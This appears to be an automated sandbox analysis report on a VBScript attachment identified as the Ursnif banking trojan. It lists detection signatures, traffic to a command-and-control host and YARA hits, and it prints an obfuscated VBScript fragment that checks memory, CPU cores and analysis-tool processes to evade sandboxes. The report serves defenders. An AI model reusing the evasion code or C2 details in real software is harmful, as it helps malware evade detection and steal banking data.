
Analysis Report view_attach_72559.vbs

Overview

General Information

Sample Name: view_attach_72559.vbs
Analysis ID: 331433
MD5: 29933320f02dfc13999ff70cd960a291
SHA1: 29db771aef8cfe3231e5f1b077bf49c096777043
SHA256: 7c4f0d072bdbf9aaba20f96173a9274376d589a171ff96d4bfbb56427ea17f7c

Detection

Ursnif
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 960 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 5528 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View | IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected:
    GET /api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: golang.feel500.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: golang.feel500.at
    Connection: Keep-Alive
Source: msapplication.xml0.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 16 Dec 2020 19:42:24 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp | String found in binary or memory: http://crl.com
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp | String found in binary or memory: http://crl.com9
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: {CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat.17.dr, ~DFCE3CEB3DA92FCDD0.TMP.17.dr | String found in binary or memory: http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBka
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: msapplication.xml.17.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.17.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.17.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.17.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.17.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.17.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.17.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.17.dr | String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000003.711863605.000001C8B6372000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712532222.000001C8B5BEB000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712769407.000001C8B4CF0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/18j267
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/18j267Nums
Source: wscript.exe, 00000000.00000003.712665350.000001C8B3A16000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1D5y47
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: view_attach_72559.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal84.troj.evad.winVBS@4/52@2/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: view_attach_72559.vbs | Static file information: File size 1478801 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\valueState\Redparagraph\unitList\Hislay\weight.pdb source: Oxnard.rb.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface:
    WScript.Sleep 2000
    If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then
        Exit Function
    End If
    ' Kankakee blasphemy sunrise bramble screwworm ho religiosity. 8769309 hoot ambitious foppish grandmother tutu widen754 passerby scratchy892 bossy109. Verde274 Byrne. 4049332
    Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")
    Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_ComputerSystem")
    For Each rTSNo In kdDsaHAdlItems
        KlcIhm = KlcIhm + Int((rTSNo.TotalPhysicalMemory) / (((81 - 2.0) + (1055520 - 278.0)) - 6745.0))
    Next
    If KlcIhm < ((8197 - (7235 - 89.0)) - (22 - 1.0)) Then
        HThYFgq
        ' novo Auckland shrewd freedman persecutory thieves745 videotape Vega regent snowy cop cremate committee126 reticulum995 spigot charisma50
    End If
    REM regress bangle, 8711784 insubstantial359 michigan effectuate Reagan sin770 earmark discriminant notate. purify, conversion571 standeth vane
    ' sidereal600 evocate dance denude burst automorphism uranium Aldrich diffract stamp Bergland signal groan railway Erik villa Leon commendatory peptide alga
    End Function
    Function spurn163()
        REM afternoon Barnhard230. alga500 whale Britain torso rapture slid indecomposable trudge Filipino. bazaar, big Hahn, cookery guilty debase, 419631 culprit Leland critic lusty cantor pater tate IEEE ceramic, 7701 crunchy verdict. effete, boulder voyage717
        on error resume next
        If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then
            ' peak Bethlehem Terre Posner stifle Agee quartermaster204 NH dauphin nomad their neither scarves
            Exit Function
            REM autocollimate Giuliano attainder isle epidemic longue spoonful ambulant j Cinderella influenza hydrous Finn. Methuselah attune rectitude cervix
        End If
        Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")
        Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_Processor", , (((4 + 300.0) - 267.0) + (28 - 17.0)))
        ' Kelvin scoff castor niece bump fiefdom491 lap sing thieving yearbook hydroxide. milestone rule. regrettable, vivify. 2683417 Lausanne ounce complain
        For Each rTSNo In kdDsaHAdlItems
            ' roundworm glad capitol beachhead. nay Malthus replica. acquaint ampere iodine vermilion saw
            If rTSNo.NumberOfCores < ((25 - (22 - (15 - 13.0))) - 2.0) Then
                chaotic = True
                ' bipolar dodecahedral518 indium polysemous documentation262 capacitance tine thicken stature crest187 petition adject spectrography polymeric howdy. sheave taft112 indubitable, conjuncture near
            End If
        Next
        If chaotic Then
            ' industrial Allegheny bedstraw bestubble variety hornmouth Wilshire813 impute281 audiotape circumsphere retrofit botanic197 cotty caught grouse county irreverent. 7472456 nursery concertina. 7200157 Rena. 6227331 adipic tetravalent. 3544323 typeset bronco python possessor383 boil, spasm377 Carl
            HThYFgq
        End If
        REM shenanigan tenebrous Borden Peruvian jackpot966 eke GU whatnot Burr Netherlands permafrost. 3030829 autocorrelate nectar recipe game hazel kayo Bose thereby blew extra
    End Function
    Function tUtsn(PKdEVC)
        on error resum

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\Oxnard.rb
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\Oxnard.rb

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\view_attach_72559.vbs
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXEH
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Oxnard.rb
Source: C:\Windows\System32\wscript.exe TID: 5588 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
